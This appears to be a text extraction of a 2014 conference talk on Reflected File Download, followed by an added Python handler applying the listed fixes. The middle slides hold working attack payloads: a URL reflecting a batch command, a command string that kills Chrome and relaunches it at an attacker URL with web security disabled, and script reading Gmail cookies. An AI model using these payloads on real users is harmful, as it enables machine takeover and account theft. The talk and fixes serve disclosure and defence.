Eu 14 Hafif Reflected File Download A New Web Attack Vector
Oren Hafif
Security Researcher
Trustwave Spiderlabs
Download executable files from Google.com & Bing.com
File executes, no warnings, and gains control over the machine
Reflected File Download
http://thechive.com/2009/02/14/these-people-exist-part-3-25-photos/
Two Major Conferences
Every summer in Vegas
There is nothing more joyful for a security professional…
Agenda
• Objectives
• Understand RFD
– What?
– Why?
– How?
• Advanced Exploitation
Agenda - What is RFD?
• DEMO!
• Analysis of the demo
Agenda – Why RFD?
• Motivation
• RFD exploitation capabilities and implications
• Trust Model for web downloads
Agenda – How RFD?
• How to Detect?
• How to Exploit?
• How to Prevent?
Age.round(28)=30
Age.round(27)=25
About Myself…
OBJECTIVES
BREAKERS: DETECT AND REPORT RFD ISSUES
DEFENDERS: PREVENT AND BLOCK RFD ATTACKS
BUILDERS: DEVELOP SECURE APIs AND WEB APPS
Windows Calculator
DEMO
Demo: Let’s talk about it…
• User clicked on a valid link to Google.com
• A malicious file got downloaded from Google.com
• The file executes immediately, once clicked.
• Windows calculator popped up (Pwned)!
No upload takes place…
A file is being downloaded…
Uploadless Downloads!
RFD Implications (Why?)
• Gain full control over the user’s machine
• Confidentiality – steal everything, install trojans
• Availability – delete everything, use cryptolockers
• Integrity – impersonate the user/website.
TRUST?
WHICH ONE WOULD YOU TRUST?
WHAT MAKES YOU TRUST A DOWNLOAD?
Referrer: 19%
Host: 81%
4 OUT OF 5 WOULD TRUST DOWNLOADS BASED ON THE HOSTING DOMAIN
Content-Type: application/json;
Content-Disposition: attachment
Content-Length: 12…
{"results":["q", "rfd\"||calc||","I love rfd"]}
https://google.com/s;/setup.bat;?q=rfd"||calc||
Google Chrome
OVER NINE HUNDREEEEDD!
Let’s use just 2 out of 973…
• --disable-web-security shuts down the same-origin policy!
• --disable-popup-blocking well…
• Result: one big mess! YOU OWN CHROME!
[Diagram: attack flow between User, Web Server and Attacker]
1 http://www.google.com/s;/ChromeSetup.bat;?q=payload&...
5 http://attacker-website.com/
6 <script> served by the attacker's page:
win = open("http://mail.google.com");
alert(win.document.body); // granted
alert(win.document.cookie); // granted
Let’s create an exploit!
1 2 3 4 5 6 7
["\"||taskkill /F /IM ch*|md||start chrome pi.vu/B2jj --disable-web-security --disable-popup-blocking||",[],{"t":{"bpc":false,"tlw":false},"q":"Xwxg4gmQoA9Zn6E2DjScDWXRzbQ"}] 8
1 Result: '["\"' is not recognized as an internal or external command, operable program or batch file.
2 || is the OR operator, since the left hand side failed, the right hand side will be executed.
3 Killing all tasks with names starting with “ch” – targeting “chrome.exe”. Chrome will be closed.
4 | pipes the output of the previous command into the next one
5 The md command creates new directories. Its only use here is to cause the expression to be false.
6 || same trick as before, continuing the execution since the last expression was false.
7 Starting Chrome at the attacker’s URL without Web security and popup blocking.
8 || this time Chrome was started successfully, so the rest of the commands are ignored.
DEMO
Stealing emails from GMAIL
DEMO
Cross-Social Network RFD Worm
How to Fix RFD?
• Use exact URL mapping – no wildcards!
• Do not escape! Encode! Not \" but \u0022 or \x22
• Add Content-Disposition with a filename attribute:
Content-Disposition: attachment; filename=1.txt
• Require Custom Headers for all APIs
• If possible use CSRF tokens
How to Fix RFD - more?
• Whitelist Callbacks – reflected by default!
• Enforce XSSI mitigation like for(;;);
• Never include user input in API usage errors.
• Remove support for Path Parameters (semicolons)
• X-Content-Type-Options: nosniff
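As an added example (not code from the talk, Google or Bing), a minimal search-API handler in Python that applies the fixes listed above: exact path matching with semicolon path parameters rejected, quotes and shell metacharacters encoded as \uXXXX instead of backslash-escaped, a whitelisted callback, a for(;;); prefix for the plain JSON form, and attachment/nosniff headers with a server-chosen filename. The API shape (the "/s" path, the handleResults callback, the results.json filename) is hypothetical, and the encoder goes beyond the slide's \u0022 example by encoding the other shell metacharacters as well.

```python
# Added example: a minimal search-API handler applying the RFD fixes from the slides.
# The API shape (path "/s", callback name, filename) is hypothetical.

EXACT_PATHS = {"/s"}                     # exact URL mapping: no wildcards, no path parameters
CALLBACK_WHITELIST = {"handleResults"}   # callbacks are never reflected, only matched here
RISKY = set('"\'<>&\\/;|')               # characters cmd.exe or a browser could give meaning to

def encode_json_string(value):
    """Encode, do not escape: a backslash-escaped quote is still a quote to cmd.exe,
    \\u0022 is not. Also encodes the other shell metacharacters and control chars."""
    return "".join("\\u%04x" % ord(c) if c in RISKY or ord(c) < 0x20 else c
                   for c in value)

def build_response(path, query, callback=None):
    """Return (status, headers, body) for a search request."""
    if ";" in path or path not in EXACT_PATHS:
        return 404, {}, ""            # /s;/setup.bat; never reaches the API
    if callback is not None and callback not in CALLBACK_WHITELIST:
        return 400, {}, ""            # unknown callback: reject it, do not reflect it
    body = '{"results":["%s"]}' % encode_json_string(query)
    if callback:
        body = "%s(%s);" % (callback, body)
    else:
        body = "for(;;);" + body      # XSSI mitigation for the plain JSON form
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        # filename chosen by the server, so the URL cannot name the download setup.bat
        "Content-Disposition": "attachment; filename=results.json",
        "X-Content-Type-Options": "nosniff",
    }
    return 200, headers, body

if __name__ == "__main__":
    # Constructed input: the reflected search term from the slides' Google example.
    status, headers, body = build_response("/s", 'rfd"||calc||')
    print(status, headers["Content-Disposition"])
    print(body)   # no literal quote or pipe survives for a shell to interpret
```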
Summary
• Your site can be used to attack users!
• Attackers get full control of the victim's machine.
• A file is downloaded without being uploaded.
• Advanced exploitation (chrome/powershell) and bypasses (windows).
• Fix it! I am so scared!
Who is responsible?
“We recognize that the address bar is the only reliable security indicator in modern browsers.”